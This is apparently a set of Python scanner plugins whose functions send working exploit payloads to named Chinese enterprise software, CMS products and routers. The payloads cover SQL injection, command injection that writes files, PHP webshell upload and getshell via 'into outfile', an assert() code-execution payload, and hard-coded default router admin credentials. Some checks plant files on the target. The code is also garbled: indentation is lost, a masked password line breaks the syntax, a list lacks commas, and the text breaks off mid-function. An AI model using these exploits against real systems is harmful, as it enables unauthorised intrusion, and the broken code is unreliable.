def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
hh = hackhttp.hackhttp()
true_url = self.target + '/E-mobile/diarydo.php?diff=reply&diary_id=1'
start_time1 = time.time()
code1, head1, body1, errcode1, fina_url1 = hh.http(true_url)
true_time = time.time() - start_time1
flase_url = self.target + \
'/E-mobile/diarydo.php?diff=reply&diary_id=sleep(5)'
start_time2 = time.time()
code2, head2, body2, errcode2, fina_url2 = hh.http(flase_url)
flase_time = time.time() - start_time2
if code1 == 200 and code2 == 200 and flase_time > true_time and flase_time > 5:
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞'.format(target=self.target,
name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
# Refer:http://www.wooyun.org/bugs/wooyun-2014-060988
hh = hackhttp.hackhttp()
url = self.target + "/service/~iufo/com.ufida.web.action.ActionServlet?RefTargetId=m_strUnitCode&onlyTwo=false¶m_orgpk=level_code&retType=unit_code&Operation=Search&action=nc.ui.iufo.web.reference.base.UnitTableRefAction&method=execute"
payload1 = "TreeSelectedID=&TableSelectedID=&refSearchProp=unit_code&refSearchPropLbl=%E5%8D%95%E4%BD%8D%E7%BC%96%E7%A0%81&refSearchOper=%3D&refSearchOperLbl=%E7%AD%89%E4%BA%8E&refSearchValue=%27or+1%3D1--"
code1, head1, res1, errcode1, _ = hh.http(url, post=payload1)
payload2 = "TreeSelectedID=&TableSelectedID=&refSearchProp=unit_code&refSearchPropLbl=%E5%8D%95%E4%BD%8D%E7%BC%96%E7%A0%81&refSearchOper=%3D&refSearchOperLbl=%E7%AD%89%E4%BA%8E&refSearchValue=%27or+1%3D2--"
code2, head2, res2, errcode2, _ = hh.http(url, post=payload2)
if (code1 == 200 and code2 == 200):
rm1 = re.findall("<tr\s*id='sortItem'", res1)
rm2 = re.findall("<tr\s*id='sortItem'", res2)
if (len(rm1) != len(rm2)):
#security_hole('sqlinject:POST [refSearchValue=>\'or 1=1]'+url)
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞'.format(target=self.target,
name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip(
'/') + '/' + (self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
# refer:http://www.wooyun.org/bugs/wooyun-2010-090874
# refer:http://www.wooyun.org/bugs/wooyun-2010-090451
hh = hackhttp.hackhttp()
payloads = [
'/showkbxx.asp?id=-1',
'/shownews.asp?id=-1'
]
getdata1 = '%20OR%201%3D1'
getdata2 = '%20OR%201%3D2'
for payload in payloads:
code1, head, res1, errcode, _ = hh.http(
self.target + payload + getdata1)
code2, head, res2, errcode, _ = hh.http(
self.target + payload + getdata2)
m1 = re.findall('<div', res1)
m2 = re.findall('<div', res2)
if code1 == 200 and code2 == 200 and m1 != m2:
#security_hole(arg + payload + " :sql Injection")
self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format(
target=self.target, name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
# refer:http://www.wooyun.org/bugs/wooyun-2010-078982
hh = hackhttp.hackhttp()
payloads = [
'/PubInfo/ldxx.asp?QryId=1', '/web/PubInfo/ldxx.asp?QryId=1'
]
getdata1 = '%27%20or%20%271%27%3D%271'
getdata2 = '%27%20or%20%271%27%3D%272'
for payload in payloads:
url1 = self.target + payload + getdata1
url2 = self.target + payload + getdata2
code1, head, res1, errcode, _ = hh.http(url1)
code2, head, res2, errcode, _ = hh.http(url2)
if code1 == 500 and code2 == 200 and 'gray.gif' not in res1 and 'gray.gif' in res2:
#security_hole(arg + payload + ' :found sql Injection')
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞'.format(target=self.target,
name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
# ref http://www.wooyun.org/bugs/wooyun-2015-0117616
hh = hackhttp.hackhttp()
arg = self.target
payload = '/acc/network/redial_pppoe.php?wan=%20|%20echo%20testvul%20>%20test.php%20|'
target = arg + payload
code, head, res, errcode, _ = hh.http(target)
payload = '/acc/network/test.php'
target = arg + payload
code, head, res, errcode, _ = hh.http(target)
if 'testvul' in res:
# security_hole(target)
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞'.format(target=self.target,
name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
# refer:http://www.wooyun.org/bugs/wooyun-2010-0107850
hh = hackhttp.hackhttp()
payload = '/checklogin.asp'
postdata1 = 'uid=11111111&pwd=11111&imageField2.x=32&imageField2.y=7'
postdata2 = 'uid=11111111%27%29%3BWAITFOR%20DELAY%20%270%3A0%3A5%27--&pwd=11111&imageField2.x=32&imageField2.y=7'
url = self.target + payload
t1 = time.time()
code1, head, res1, errcode1, _ = hh.http(url, postdata1)
t2 = time.time()
code2, head, res2, errcode2, _ = hh.http(url, postdata2)
t3 = time.time()
errtime = t3 - t2
truetime = t2 - t1
if errtime - truetime > 3:
# security_hole(arg+payload)
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞'.format(target=self.target,
name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
# refer:http://www.wooyun.org/bugs/wooyun-2010-0116142
hh = hackhttp.hackhttp()
payloads = [
'/modules/pdflist.aspx?info_id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHAR%28113%29%2bCHAR%2898%29%2bCHAR%28112%29%2bCHAR%28107%29%2bCHAR%28113%29%2bCHAR%28102%29%2bCHAR%2897%29%2bCHAR%2876%29%2bCHAR%28113%29%2bCHAR%28109%29%2bCHAR%2872%29%2bCHAR%2888%29%2bCHAR%28108%29%2bCHAR%28117%29%2bCHAR%2877%29%2bCHAR%28113%29%2bCHAR%28112%29%2bCHAR%28120%29%2bCHAR%28113%29%2bCHAR%28113%29%2CNULL%2CNULL%2CNULL--',
'/modules/pdflist.aspx?info_id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%28102%29%7C%7CCHR%2897%29%7C%7CCHR%2876%29%7C%7CCHR%28113%29%7C%7CCHR%28109%29%7C%7CCHR%2872%29%7C%7CCHR%2888%29%7C%7CCHR%28108%29%7C%7CCHR%28117%29%7C%7CCHR%2877%29%7C%7CCHR%28113%29%7C%7CCHR%28112%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%2CNULL%2CNULL%2CNULL%20FROM%20DUAL--'
]
for payload in payloads:
url = self.target + payload
code, head, res, errcode, _ = hh.http(url)
if 'qbpkqfaLqmHXluMqpxqq' in res:
#security_hole(arg + 'modules/pdflist.aspx?info_id=1')
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞'.format(target=self.target,
name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
# refer:http://www.wooyun.org/bugs/wooyun-2010-0132188
hh = hackhttp.hackhttp()
arg = self.target
payload = '/opac/ckmarc.jsp'
postdata1 = 'kzh=zyk0040640%27%20AND%201%3D1%20AND%20%27jyNX%27%3D%27jyNX'
postdata2 = 'kzh=zyk0040640%27%20AND%201%3D2%20AND%20%27jyNX%27%3D%27jyNX'
code1, head, res1, errcode, _ = hh.http(arg + payload, postdata1)
code2, head, res2, errcode, _ = hh.http(arg + payload, postdata2)
m1 = re.findall('</td>', res1)
m2 = re.findall('</td>', res2)
if code1 == 200 and code2 == 200 and m1 != m2:
#security_hole(arg+payload+' :found sql Injection')
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞'.format(target=self.target,
name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
# http://www.wooyun.org/bugs/wooyun-2010-0129390
# http://www.wooyun.org/bugs/wooyun-2010-0129392
hh = hackhttp.hackhttp()
# SQL注入 SQL Server 注入
arg = self.target
payloads = [
#self.target + '/csccmis/jctxx.asp?jcid=1%20and%201=@@version%20--',
#self.target + '/csccmis/jczp.asp?jcid=1%20or%201=@@version%20--',
#self.target + '/csccmis/jczpOld.asp?jcid=1%20or%201=@@version%20--',
arg + '/csccmise/jczp.asp?jcid=1%20or%201=@@version%20--',
arg + '/csccmise/jctxx.asp?jcid=1%20or%201=@@version%20--',
#arg + 'csccmissm/jctxx.asp?jcid=1%20or%201=@@version%20--',
#arg + 'csccmissm/jczp.asp?jcid=1%20or%201=@@version%20--',
#arg + 'csccmissm/jczpOld.asp?jcid=1%20or%201=@@version%20--',
]
for payload in payloads:
code, head, res, err, _ = hh.http(payload)
# print res
if code != 0 and 'Microsoft SQL Server' in res:
#security_hole('SQL injection: '+ payload)
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞'.format(target=self.target,
name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
# info:http://www.wooyun.org/bugs/wooyun-2015-098450\http://www.wooyun.org/bugs/wooyun-2015-0134150
hh = hackhttp.hackhttp()
arg = self.target
payloads = (
# 入侵日志
'/cgi-pub/exportdata.cgi?type=1&begintime=20150101&endtime=20150102',
# 系统日志
'/cgi-pub/exportdata.cgi?type=3&begintime=20150101&endtime=20150102',
# 阻断日志
'/cgi-pub/exportdata.cgi?type=12&begintime=20150101&endtime=20151218'
)
for payload in payloads:
url = arg + payload
code, head, res, errcode, _ = hh.http(url)
if code == 200 and 'Attack Time' in res and 'Action' in res:
# security_hole("铱迅web应用安全网关信息泄漏,参照:wooyun-2015-098450,wooyun-2015-0134150\n%s\n%s\n%s"%(exp1,exp2,exp3))
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞'.format(target=self.target,
name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip(
'/') + '/' + (self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
# https://bugs.shuimugan.com/bug/view?bug_no=102603
hh = hackhttp.hackhttp()
arg = self.target
start_time1 = time.time()
code1, head, res, errcode, _ = hh.http(arg)
true_time = time.time() - start_time1
start_time2 = time.time()
url = arg + "/DeMandTest.aspx?B=0&Month=1&PLCNr=5;WAITFOR%20DELAY%20'0:0:6'--&MeterID=1"
code2, head, res, errcode, _ = hh.http(url)
flase_time = time.time() - start_time2
if code1 == 200 and code2 == 500 and flase_time > true_time and flase_time > 5 and true_time < 2:
# security_hole(url)
self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format(
target=self.target, name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
hh = hackhttp.hackhttp()
anpayloads = [
'/pubinfo/Moreysxk.asp?Qryxmmc=111',
'/web/pubinfo/Moreysxk.asp?Qryxmmc=111'
]
angetdata = '%25%27%20UNION%20ALL%20SELECT%201%2C2%2C3%2C4%2Csys.fn_varbintohexstr%28hashbytes%28%27MD5%27%2C%271234%27%29%29%2C6%2C7%2C8%2C9--%20%26Qryxkzh%3D1'
for anpayload in anpayloads:
url = self.target + anpayload + angetdata
code, head, res, errcode, _ = hh.http(url)
if code == 200 and '0x81dc9bdb52d04dc20036dbd8313ed055' in res:
#security_hole(arg + anpayload + ' :found sql Injection')
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞'.format(target=self.target,
name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
# info:http://www.wooyun.org/bugs/wooyun-2015-0140998
hh = hackhttp.hackhttp()
url = self.target + '/direct/polling/CommandsPolling.php'
postdata = "command=ping&filename=&cmdParam=qq.com,ifconfig"
code, head, res, errcode, _ = hh.http(url, post=postdata)
filepath = res[res.find('/'):res.find('qq.com') + 6].replace(
'\\', '')
postdata = "command=ping&filename=%s&cmdParam=qq.com,ifconfig" % filepath
code, head, res, errcode, _ = hh.http(url, post=postdata)
if code == 200 and 'Ethernet HWaddr' in res:
# security_hole(url)
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞'.format(target=self.target,
name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
# ref http://www.wooyun.org/bugs/wooyun-2015-0122599
hh = hackhttp.hackhttp()
payload = '/search.php?mid=1&action=search&keyword=asd&postdb[city_id]=../../admin/hack&hack=jfadmin&action=addjf&Apower[jfadmin_mod]=1&fid=1&title=${@assert($_POST[yu])}'
url1 = self.target + payload
url2 = self.target + '/do/jf.php'
post = 'yu=phpinfo();'
code, head, res, errcode, _ = hh.http(url1)
code, head, res, errcode, _ = hh.http(url2, post=post)
if code == 500 and 'phpinfo()' in res and 'AUTH_PASSWORD' in res:
# security_hole(url2)
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞'.format(target=self.target,
name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
# refer: http://www.wooyun.org/bugs/wooyun-2010-0128007
hh = hackhttp.hackhttp()
arg = self.target
md5_1 = 'c4ca4238a0b923820dcc509a6f75849b'
filename = 'wtFtw' + str(random.randint(111, 999)) + '.php'
payload = '[group]:[1]|[groupid]:[1 union select 0x3c3f706870206563686f206d64352831293b203f3e,2,3,4,5,6,7,8 into outfile \'../webroot/{filename}\']'.format(
filename=filename)
payload = base64.b64encode(payload)
# print payload
url = arg + '/inc/group_user_list/group_xml.php?par=' + payload
code, head, res, err, _ = hh.http(url)
if code == 200:
code, head, res, err, _ = hh.http(arg + '/' + filename)
if (code == 200) and (md5_1 in res):
#security_hole('weaver e-office getshell: ' + url)
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞'.format(target=self.target,
name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
hh = hackhttp.hackhttp()
arg = self.target
port = 23
time = 5
user = '******'
password = '******'%s\') = %u'
finish = '->'
try:
t = telnetlib.Telnet(arg, port, timeout=time)
t.write(user + '\n')
t.read_until('password: '******'\n')
str1 = t.read_until(finish)
t.write("?\n")
str = t.read_until(finish)
t.close()
if ('->' in str) and ('exec' in str):
# security_hole(arg)
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞'.format(target=self.target,
name=self.vuln.name))
except Exception as e:
pass
except Exception as e:
self.output.info('执行异常{}'.format(e))
def exploit(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
# wooyun-2014-077033
hh = hackhttp.hackhttp()
arg = self.target
path = '/manager/config_SSO.php'
target = arg + path
code, head, res, errcode, _ = hh.http(target)
if code == 200 and ('os_name' in res) and ('telnet_os_login_mes'
in res):
#security_warning("Unauthorized access"+target)
shell_data = "type_mode=5201314<?php echo md5(3.14);?>&os_name=HP_11&config_flag=1"
code, head, res, errcode, _ = hh.http(target, shell_data)
exec_data = "os_name=a%20|cp%20/usr/local/keyou/Config/sso/HP_11/Template.cnf%20/usr/local/apache2/htdocs/project/www/sh.php%20|&config_flag=1"
code, head, res, errcode, _ = hh.http(target, exec_data)
target = arg + '/sh.php'
code, head, res, errcode, _ = hh.http(target)
if code == 200 and '4beed3b9c4a886067de0e3a094246f78' in res:
# security_hole("getshell:"+target)
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞,获取shell为:{shell}'.format(
target=self.target,
name=self.vuln.name,
shell=target))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip(
'/') + '/' + (self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
# refer: http://www.wooyun.org/bugs/wooyun-2014-058932
# refer: http://www.wooyun.org/bugs/wooyun-2014-058971
# refer: http://www.wooyun.org/bugs/wooyun-2014-058988
# refer: http://www.wooyun.org/bugs/wooyun-2014-077810
hh = hackhttp.hackhttp()
arg = self.target
# 报错注入
payloads = [
arg +
'/WebPages/history.php?uid=1%20and%20extractvalue(0x1,concat(0x23,(select%20md5(1))))',
arg +
'/WebPages/applyhardware.php?action=applyhardware&hard_user=test%2527%20and%20extractvalue(0x1,concat(0x23,(select%20md5(1))))%23',
arg +
'/WebPages/singlelogin.php?loginId=1%20and%20extractvalue(0x1,concat(0x23,(select%20md5(1))))%23&submit=t',
]
md5_1 = 'c4ca4238a0b923820dcc509a6f75849'
for payload in payloads:
code, head, res, err, _ = hh.http(payload)
if code == 200 and md5_1 in res:
#security_hole('SQL injection: ' + payload)
self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format(
target=self.target, name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
# ref http://www.wooyun.org/bugs/wooyun-2015-0117621
hh = hackhttp.hackhttp()
arg = self.target
payload = "/acc/debug/bytecache_run_action.php?action=2&engine=%20|%20echo%20testvultest3%20>%20a1.php%20|%20&ipfilter=10"
target = arg + payload
code, head, res, errcode, _ = hh.http(target)
payload = '/acc/debug/a1.php'
target = arg + payload
code, head, res, errcode, _ = hh.http(target)
if 'testvultest3' in res:
# security_hole(target)
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞'.format(target=self.target,
name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
# Refer:http://www.wooyun.org/bugs/wooyun-2014-049406
hh = hackhttp.hackhttp()
arg = self.target
# get the Frm_Logintoken
code1, head1, res1, errcode1, finalurl1 = hh.http(arg)
partten = re.compile(
'document\.getElementById\("Frm_Logintoken"\).value = "(\d{5,8})";'
)
match = partten.search(res1)
Frm_Logintoken = ""
if match:
Frm_Logintoken = match.group(1)
url1 = arg + "/getpage.gch?pid=1001&logout=1"
data = "Username=telecomadmin&Password=nE7jA%255m&Frm_Logintoken=" + Frm_Logintoken
# proxy=('127.0.0.1',8080)
code, head, res, errcode, finalurl = hh.http(arg, post=data)
if code == 200 and "src=\"template.gch\"" in res:
# security_hole("电信路由器配置不当,存在超级管理员账号登陆"+arg)
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞'.format(target=self.target,
name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
# refer:http://www.wooyun.org/bugs/wooyun-2010-0107187
hh = hackhttp.hackhttp()
arglist = matchurl(self.target)
for arg in arglist:
payload1 = '?nowlx=m%27%20or%20%271%27=%271'
payload2 = '?nowlx=m%27%20or%20%271%27=%272'
url1 = self.target + payload1
url2 = self.target + payload2
code1, head, res1, errcode, _ = hh.http(url1)
code2, head, res2, errcode, _ = hh.http(url2)
m1 = re.search('class="gray"', res1)
m2 = re.search('class="gray"', res2)
if code1 == 200 and code2 == 200 and m1 and m2 == None:
#security_hole(arg +'?nowlx=m'+' :found sql Injection')
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞'.format(target=self.target,
name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip(
'/') + '/' + (self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
hh = hackhttp.hackhttp()
url = self.target + \
"/feedback/uploadfile_save.php?met_file_format=pphphp&met_file_maxsize=9999&lang=metinfo"
raw = '''
POST /feedback/uploadfile_save.php?met_file_format=pphphp&met_file_maxsize=9999&lang=metinfo HTTP/1.1
Host: localhost
Content-Length: 423
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: null
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryE1toBNeESf6p0uXQ
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=hfqa37uap92gdaoc2nsco6g0n1
------WebKitFormBoundaryE1toBNeESf6p0uXQ
Content-Disposition: form-data; name="fd_para[1][para]"
filea
------WebKitFormBoundaryE1toBNeESf6p0uXQ
Content-Disposition: form-data; name="fd_para[1][type]"
5
------WebKitFormBoundaryE1toBNeESf6p0uXQ
Content-Disposition: form-data; name="filea"; filename="test.php"
Content-Type: application/x-php
<?php echo md5(1); ?>
------WebKitFormBoundaryE1toBNeESf6p0uXQ--
'''
# proxy=('127.0.0.1',8080)
code, head, res, errcode, finalurl = hh.http(url, raw=raw)
# upload file
# get upload file name
name = int(time.time())
for i in range(100, 10000):
filename = name + i
url = self.target + '/upload/file/%s.php' % (str(filename))
# print url
code, head, res, errcode, finalurl = hh.http(url)
if code == 200 and "c4ca4238a0b923820dcc509a6f75849b" in res:
#security_hole('file upload Vulnerable:'+arg+"feedback/uploadfile_save.php?met_file_format=pphphp&met_file_maxsize=9999&lang=metinfo")
self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format(
target=self.target, name=self.vuln.name))
break
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
# Referer : http://www.wooyun.org/bugs/wooyun-2010-066850
hh = hackhttp.hackhttp()
payloads = [['/status_dev_info_t.gch', 'Frm_CarrierName'],
['/manager_dev_config_t.gch', 'ConfigUpload'],
['/wlan_security.gch', 'PreSharedKey'],
['/manager_log_conf_t.gch', 'Transfer_meaning']]
for p in payloads:
url = self.target + p[0]
code, head, res, errcode, _ = hh.http(url)
if p[1] in res:
# security_hole(url)
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞'.format(target=self.target,
name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
hh = hackhttp.hackhttp()
payloads = [
"/kingdee/Template/TemplateEdit.jsp?RecordID=1'%20WAITFOR%20DELAY%20'0:0:0'--%20",
"/kingdee/Template/TemplateSave.jsp?FileName=1'%20WAITFOR%20DELAY%20'0:0:0'--%20",
"/kingdee/DocumentEdit.jsp?RecordID=1'%20WAITFOR%20DELAY%20'0:0:0'--%20&UserName=1",
"/kingdee/DocumentSave.jsp?RecordID=1'%20WAITFOR%20DELAY%20'0:0:0'--%20&Template=1&Subject=1&Author=1&FileDate=1&FileType=1&HTMLPath=1",
"/kingdee/DocumentShow.jsp?Template=1'%20WAITFOR%20DELAY%20'0:0:0'--%20&UserName=1"
]
for p in payloads:
url1 = self.target + p
url2 = self.target + p.replace("0:0:0", "0:0:5")
t1 = time.time()
code1, head1, res1, err1, _1 = hh.http(url1)
t2 = time.time()
code2, head2, res2, err2, _2 = hh.http(url2)
t3 = time.time()
if code1 != 0 and code2 != 0 and t3 - t2 - t2 + t1 > 3:
#security_hole(url2 + "has time-based blind")
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞'.format(target=self.target,
name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
"""
该产品是用于:滑坡监测,尾矿库安全监测,水库大坝安全监测,桥梁健康监测,沉降塌陷监测,建筑监测,机械精密控制,精准农业导航,和精密定位的GNSS接收机。
POC Name : 中海达VNet6专业型参考站接收机 SQL注入
使用默认的账号密码(zhdgps/zhdgps)
"""
# 几乎都有这个漏洞??????????????
hh = hackhttp.hackhttp()
arg = self.target
payload1 = '/index.php?lang=en&pid=200%20and%201011-1010=1' # 1011-1010 运算
payload2 = '/index.php?lang=en&pid=200%20and%201011-1010=2'
url1 = arg + payload1
url2 = arg + payload2
code1, head, res1, errcode, _ = hh.http(url1)
code2, head, res2, errcode, _ = hh.http(url2)
if (code1 == 200) and res1 not in res2:
#security_hole(url1 + ' SQL injection')
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞'.format(target=self.target,
name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
hh = hackhttp.hackhttp()
payloads = [
'/index.php?s=/home/shopcart/getPricetotal/tag/1%27'
'/index.php?s=/home/shopcart/getpriceNum/id/1%27'
'/index.php?s=/home/user/cut/id/1%27'
'/index.php?s=/home/service/index/id/1%27'
'/index.php?s=/home/pay/chongzhi/orderid/1%27'
'/index.php?s=/home/pay/index/orderid/1%27'
'/index.php?s=/home/order/complete/id/1%27'
'/index.php?s=/home/order/detail/id/1%27'
'/index.php?s=/home/order/cancel/id/1%27'
]
for payload in payloads:
verify_url = self.target + payload
code, head, res, errcode, _ = hh.http(verify_url)
if '1064 You have' in res:
#security_hole("infomation leak:"+poc)
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞'.format(target=self.target,
name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
hh = hackhttp.hackhttp()
data = 'submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&nowait=1&ping_size=32&ping_times=5&ping_ip=ls'
url = self.target + '/apply.cgi'
code, head, res, errcode, _ = hh.http(
url,
data,
Cookie=
'wys_userid=admin,wys_passwd=5982861B34B74E9A6DAD66A9895CDFFF')
if 'X2000' in res and 'You must input an IP Address or Domain Name' in res:
#security_hole('Linksys X2000 Command Execution AND Unauthorized access!')
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞'.format(target=self.target,
name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
# refer: http://www.wooyun.org/bugs/wooyun-2014-058987
hh = hackhttp.hackhttp()
arg = self.target
md5_1 = 'c4ca4238a'
# cookie注入
